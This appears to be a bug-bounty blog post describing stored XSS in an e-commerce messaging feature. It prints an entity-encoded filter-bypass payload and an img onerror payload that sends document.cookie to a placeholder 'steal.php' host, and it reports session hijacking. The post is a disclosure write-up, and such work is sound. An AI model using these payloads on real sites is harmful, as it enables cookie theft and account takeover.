Hey everyone,

Today, I’m gonna share my story of an interesting XSS that I found on the same website that’s “redacted.com”. Since it was an e-commerce website, it had a feature where buyers and sellers can contact each other by sending messages. It seemed interesting to me and I decided to test it for XSS.

I made two accounts, one as a buyer and another as a seller. I started with sending “<>” to my seller’s account to see if these tags are being HTML encoded or not. To my surprise, the filter didn’t encode it. I decided to use the most powerful payload of all time,

<script>alert()</script>

As I typed the complete payload in the text box, an alert popped up. I was happy.

My Mind: Oh! That was a piece of cake.

My Fate:

As I clicked send, BOOM! I got an error. I was wondering why did it happen. I thought it to be some client-side filter which is preventing the XSS payload to be sent. I tried to bypass the client-side filter using Burpsuite but hard luck! Then, I tried sending <script> and alert() separately to see what actually is being prevented by the filter. It didn’t allow me to send either. I tried using prompt() instead of alert() to bypass the filter but again, hard luck. I moved on to hex encode it and this time I got success. I escaped the filter using hex encoding. I made another payload, hoping success this time.

<img src=x onerror=“&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041”>

YES! It escaped the filter! I quickly went to my seller’s account to see if I got an alert there.

Wait! What? No alert there. I checked the source and saw that the “onerror=[hex encoded payload]” got truncated, only <img src=x> was left. I was like:

I tried all possible ways to trigger alert but got no success at all. The filter was working way better than I expected. It was becoming really frustrating since almost everything was being filtered that was necessary to popup an alert. I really lost hope that I would get XSS there. The alert that popped up when I typed the payload in the text box was also of no use, since it was a Self Reflected XSS. I decided to take a break and go out for a walk.

My fate to my mind:

While walking, I was continuously thinking about it. It was the time to think out of the box since, I tried every possible way inside the box. Suddenly, a thought came in my mind that what the hell was I going to do with an alert, since an alert is just a confirmation. I thought that instead of trying to trigger an alert, I should actually try to demonstrate the impact of the same. At the same time, an alert triggered in my mind that <img src=x> got escaped when I tried to send the hex encoded payload. It got my nerves.

I came back with uprising hopes and tried sending <img src=x> to check if it’s working or not. Yes, it’s working. I quickly replaced x with a valid URL and saw that the image got rendered in the message box of seller. At that moment, I was not interested in triggering an alert at all. I decided to demonstrate how an attacker can steal cookies of sellers and other buyers using it. I went to my text editor, coded few lines in PHP to steal cookies and uploaded it to a free web hosting.

I made my final payload to request the PHP script that I uploaded on web hosting service so that I can steal cookies of the seller.

<img src=x onerror=“this.src=‘https://[your-webhosting]/steal.php?cookie=’+document.cookie”>

I quickly switched to my seller’s account and YES! The payload finally worked. I got the cookies! I tried to perform actions on the behalf of seller by replacing the cookies and WOAH! It worked.

I was like:

You can connect via:

HAPPY HACKING!

Info-Sec Lover ❣️❣️

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store